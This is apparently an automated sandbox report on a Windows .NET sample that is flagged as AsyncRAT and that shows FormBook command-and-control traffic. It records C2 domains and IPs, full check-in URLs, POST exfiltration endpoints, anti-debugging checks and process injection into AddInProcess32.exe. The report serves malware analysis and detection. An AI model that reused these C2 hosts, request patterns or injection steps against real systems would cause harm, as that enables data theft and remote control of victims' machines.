Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 4, 2023, 5:12 p.m.	April 4, 2023, 5:15 p.m.

Size	1.2MB
Type	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5	`8b817b79a103307dcd00a353e6bc13ac`
SHA256	`db1bb8073aee3e305bb82057150fc2ffba8b4a9e744b9635a75625618935b6fd`
CRC32	`B0CB89E4`
ssdeep	`12288:vRqBDDAGkC0fP1QG7rVtzRHmApSBvSdK+OyxesV07YkWd56Q5XhnQLyhkwL0jiCP:0Pe/r1p3O2nvhLOiCMIWobWdwxl0`
PDB Path	/_/artifacts/obj/Launcher/Release/net45/Launcher.pdb
Yara	UPX_Zero - UPX packed file IsPE64 - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
1280
- AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
  2696

Name	Response	Post-Analysis Lookup
www.zservers.xyz	A 103.42.108.46	103.42.108.46
www.tugrow.top	A 66.29.131.66	66.29.131.66
www.xn--pdotrychler-l8a.ch	A 95.130.17.35	95.130.17.35
www.amateurshow.online	A 198.37.115.75	198.37.115.75
www.howtrue.info	CNAME howtrue.info A 184.168.113.29	184.168.113.29
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
103.42.108.46	Active	Moloch
164.124.101.2	Active	Moloch
184.168.113.29	Active	Moloch
198.37.115.75	Active	Moloch
45.33.6.223	Active	Moloch
66.29.131.66	Active	Moloch
95.130.17.35	Active	Moloch
192.253.237.20	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49173 -> 66.29.131.66:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 66.29.131.66:80	2031413	ET MALWARE FormBook CnC Checkin (POST) M2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 184.168.113.29:80	2031413	ET MALWARE FormBook CnC Checkin (POST) M2	Malware Command and Control Activity Detected
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 103.42.108.46:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 103.42.108.46:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 103.42.108.46:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 103.42.108.46:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 95.130.17.35:80	2031413	ET MALWARE FormBook CnC Checkin (POST) M2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 66.29.131.66:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 66.29.131.66:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 66.29.131.66:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 66.29.131.66:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 103.42.108.46:80	2031413	ET MALWARE FormBook CnC Checkin (POST) M2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 184.168.113.29:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 184.168.113.29:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 198.37.115.75:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 184.168.113.29:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 198.37.115.75:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 198.37.115.75:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 95.130.17.35:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 95.130.17.35:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 95.130.17.35:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 4, 2023, 5:12 p.m.			0	0
IsDebuggerPresent April 4, 2023, 5:12 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey April 4, 2023, 5:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003a02c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003a03a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 4, 2023, 5:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003a03a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

/_/artifacts/obj/Launcher/Release/net45/Launcher.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 4, 2023, 5:12 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.amateurshow.online/hjdr/?4DfzboWa=xX5SVKkWhoDut3GzBaDmppnEHsg/q+4WKSSlO6xSWbIBYORImKJaBpt9iPBmVz2FT2wLfcB9Y2Q6assiK3BzS8oN8k0Uh6RuPdoxrUM=&P-nwqe=rBAJq-X
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.howtrue.info/hjdr/?4DfzboWa=kJhn0XnRZRgnPBFsTC3RrkdNU3jL2gKJb5tjL3sD/5M7+ZJLcewBYYG+QRdPVJXXplIlf5qgAFj8zlCmH3brR5caIrNXSuF9PhWnmJU=&P-nwqe=rBAJq-X
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tugrow.top/hjdr/?4DfzboWa=2Lz3cRNcgovZAvoxkyTJJkVbnS/f0a6Q88r0UIjg2Los90+Pf0cBdPH279Q+Q6Q5Wf8ziDEK77rXCjEWctJre0mQm9v094R3uDXqBk4=&P-nwqe=rBAJq-X
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.xn--pdotrychler-l8a.ch/hjdr/?4DfzboWa=viX6L1AgcIzkNKvffNzJJ+Yd0/U+wEe4YYZ25bQBQN6YyRvPjBEvK6hqMFdbfSlnHMzHqKUOr90SHQpYKy1ow0mwR1Rp7LB2XNGkbPc=&P-nwqe=rBAJq-X

Performs some HTTP requests (9 events)

request	GET http://www.amateurshow.online/hjdr/?4DfzboWa=xX5SVKkWhoDut3GzBaDmppnEHsg/q+4WKSSlO6xSWbIBYORImKJaBpt9iPBmVz2FT2wLfcB9Y2Q6assiK3BzS8oN8k0Uh6RuPdoxrUM=&P-nwqe=rBAJq-X
request	GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
request	POST http://www.zservers.xyz/hjdr/
request	POST http://www.howtrue.info/hjdr/
request	GET http://www.howtrue.info/hjdr/?4DfzboWa=kJhn0XnRZRgnPBFsTC3RrkdNU3jL2gKJb5tjL3sD/5M7+ZJLcewBYYG+QRdPVJXXplIlf5qgAFj8zlCmH3brR5caIrNXSuF9PhWnmJU=&P-nwqe=rBAJq-X
request	POST http://www.tugrow.top/hjdr/
request	GET http://www.tugrow.top/hjdr/?4DfzboWa=2Lz3cRNcgovZAvoxkyTJJkVbnS/f0a6Q88r0UIjg2Los90+Pf0cBdPH279Q+Q6Q5Wf8ziDEK77rXCjEWctJre0mQm9v094R3uDXqBk4=&P-nwqe=rBAJq-X
request	POST http://www.xn--pdotrychler-l8a.ch/hjdr/
request	GET http://www.xn--pdotrychler-l8a.ch/hjdr/?4DfzboWa=viX6L1AgcIzkNKvffNzJJ+Yd0/U+wEe4YYZ25bQBQN6YyRvPjBEvK6hqMFdbfSlnHMzHqKUOr90SHQpYKy1ow0mwR1Rp7LB2XNGkbPc=&P-nwqe=rBAJq-X

Sends data using the HTTP POST Method (4 events)

request	POST http://www.zservers.xyz/hjdr/
request	POST http://www.howtrue.info/hjdr/
request	POST http://www.tugrow.top/hjdr/
request	POST http://www.xn--pdotrychler-l8a.ch/hjdr/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

www.tugrow.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 83 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3601000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c9b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000cb0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3602000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3604000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3604000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3604000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3604000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f46000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ebc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fd3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 4, 2023, 5:12 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 4, 2023, 5:12 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Terminates another process (12 events)

Time & API	Arguments	Status
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2476 process_handle: 0x000000000000026c
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2476 process_handle: 0x000000000000026c	1
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2512 process_handle: 0x0000000000000278
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2512 process_handle: 0x0000000000000278	1
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2548 process_handle: 0x0000000000000280
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2548 process_handle: 0x0000000000000280	1
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2584 process_handle: 0x0000000000000288
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2584 process_handle: 0x0000000000000288	1
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2620 process_handle: 0x0000000000000290
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2620 process_handle: 0x0000000000000290	1
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2660 process_handle: 0x0000000000000298
NtTerminateProcess April 4, 2023, 5:12 p.m.	status_code: 0xffffffff process_identifier: 2660 process_handle: 0x0000000000000298	1

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 069cef81f53c4d93185e7d3a3a4c729061c90421
buffer	Buffer with sha1: 3756a851490d267a3b467473f19c291f9e1770a0

Communicates with host for which no DNS query was performed (1 event)

host

192.253.237.20

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 4, 2023, 5:12 p.m.	process_identifier: 2696 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000294	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1280 resumed a thread in remote process 2696
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x0000000000000298 suspend_count: 1 process_identifier: 2696	1	0	0

Executed a process and injected code into it, probably while unpacking (16 events)

Time & API	Arguments	Status	Return
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1280	1	0
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 1280	1	0
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 1280	1	0
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x0000000000000250 suspend_count: 1 process_identifier: 1280	1	0
NtGetContextThread April 4, 2023, 5:12 p.m.	thread_handle: 0x00000000000000c8	1	0
NtGetContextThread April 4, 2023, 5:12 p.m.	thread_handle: 0x00000000000000c8	1	0
NtResumeThread April 4, 2023, 5:12 p.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 1280	1	0
